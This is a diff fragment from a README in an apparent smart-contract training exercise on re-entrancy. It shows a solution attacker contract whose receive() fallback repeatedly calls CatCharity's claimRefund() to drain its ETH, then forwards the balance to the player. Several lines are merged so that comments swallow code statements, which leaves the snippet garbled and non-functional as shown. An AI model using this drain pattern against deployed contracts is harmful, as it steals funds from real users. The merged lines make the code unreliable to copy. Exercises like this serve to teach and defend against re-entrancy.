radovluk/Smart-Contract-Exercise/05-Re-Entrancy/solution/solution-code/README.md

         // Step 2: Start the refund loop catCharity.claimRefund();

-        // Step 3: Send the money back to player
-        (bool success, ) = msg.sender.call{value: address(this).balance}("");
+        // Step 3: Send the money back to the player (bool success, ) = msg.sender.call{value: address(this).balance}("");
         require(success, "Transfer failed");
     }

     // Fallback triggered whenever this contract receives Ether receive() external payable {
-        // If there's still ETH left in the CatCharity, re-claim if (address(catCharity).balance > 0) {
+        // If there's still ETH left in the CatCharity, reclaim it if (address(catCharity).balance > 0) {
             catCharity.claimRefund();
         }